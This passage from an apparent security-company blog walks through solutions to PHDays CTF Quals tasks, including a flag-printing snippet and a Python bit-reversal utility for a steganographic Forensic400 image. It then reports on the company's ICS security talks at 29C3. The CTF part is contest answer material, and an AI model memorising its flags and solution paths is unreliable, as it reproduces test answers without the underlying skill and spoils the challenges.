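          rates = [10, 2, 15, 7, 3, 12, 9, 4] * 4
          flag = ''.join('{:x}'.format(r) for r in rates)
          print(flag)  # a hex string of 32 characters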

      Ten minutes before the end of the PHDays CTF Quals, the team ufologists tried to submit an MD5 hash that differed from the correct flag by a couple of characters. Unfortunately, they ran out of time to eliminate the bug.

      In the end, no team managed to solve the task.

      Forensic400

      The teams were provided with a 512x512-pixel image in the PNG format.  


      Task for Forensic 400

      Analyzing the image in any graphics editor, it can be noticed that the image contains more than three colors: the white and red areas are not homogeneous. The first hint (Not all white pixels are the same white :)) pointed to this fact. Blackening them exposes the pixels that are almost, but not exactly, white or red.


      Blackening result

      It is obvious that the pixels are allocated in some order. It is difficult to see, remember, or guess what this order is, which is why the second and most important hint was given (a,b,c,d,e,f,g,h <-> a,e,c,g,b,f,d,h): an example of the bit-reversal permutation. For this permutation to apply, the length of the original sequence must be a power of two, and the image size meets this condition.

      Then it was necessary to write a utility implementing the permutation described above (a sketch is given below), which yields the following image:
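
      A possible implementation of such a utility; applying the bit reversal to row and column indices independently is one plausible reading (the solver may need to experiment with rows, columns, or a flattened pixel sequence):

          def bit_reverse(i: int, bits: int) -> int:
              # Reverse the lowest `bits` bits of i; for bits=3 this maps
              # 0..7 -> 0,4,2,6,1,5,3,7, i.e. a,b,c,d,e,f,g,h -> a,e,c,g,b,f,d,h.
              r = 0
              for _ in range(bits):
                  r = (r << 1) | (i & 1)
                  i >>= 1
              return r

          N, BITS = 512, 9  # 512 = 2**9, so the permutation applies cleanly

          def permute(img):
              # img: N x N array of pixels; permute row and column indices.
              return [[img[bit_reverse(y, BITS)][bit_reverse(x, BITS)]
                       for x in range(N)] for y in range(N)]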



      Permutation result

      Brackets are clearly visible, which means the previous step was correct! However, the text is superimposed on itself. Removing part of the image and applying the permutation again, we obtain a part of the flag:



      Obtaining the flag part

      Then we only need to work out which parts to remove in order to obtain the other parts of the flag.




      Obtaining the other flag parts

      The task was solved by two teams: first Magic-Hat (RU), then Plaid Parliament of Pwning (US). It is only fair to note that the bit-reversal permutation had been described on the Russian-language resource habrahabr.ru a few months earlier, so the result of team PPP deserves respect!

      A few days ago, we published in our blog a detailed review of the task Binary 500, which no team managed to solve.

      You can look through the participants' write-ups to see how they coped with the tasks.

      Positive Technologies Experts Took Part in Chaos Communication Congress in Hamburg

      Chaos Communication Congress, organized by the Chaos Computer Club, is one of the oldest (held since 1984) and largest events of the European hacker world. The latest meeting, the twenty-ninth in succession (29C3, as the organizers call it), brought together 6,000 participants, including representatives of our company: Sergey Gordeychik, Gleb Gritsay, and Yury Goltsev.

      The Congress program included numerous talks and workshops covering various aspects of information security.

      Sergey Gordeychik and Gleb Gritsay presented the results of their security research into the largest ICS solutions.


      By the way, this presentation was partially shown at the Power of Community (PoC) conference held in Seoul.

      The report drew great interest from both the audience in the hall and viewers online, and, by popular request, the Positive Technologies team joined the workshop on ICS security run by Maryna Krotofil, a doctoral candidate at Hamburg University of Technology.


      In the end, the workshop ran for two hours instead of the hour planned by the organizers, and various vulnerabilities in programmable logic controllers were demonstrated.


      However, it was not the only workshop in which Positive Technologies representatives took part: Yury Goltsev held a competition and workshop named $natch, developed from the online banking contests first held at Positive Hack Days 2012. In addition, our team gave an overview of the PHDays III forum during the Lightning Talks.

      Congress Wiki page: https://events.ccc.de/congress/2012/wiki/Main_Page
      Congress weblog: http://events.ccc.de/category/29c3/
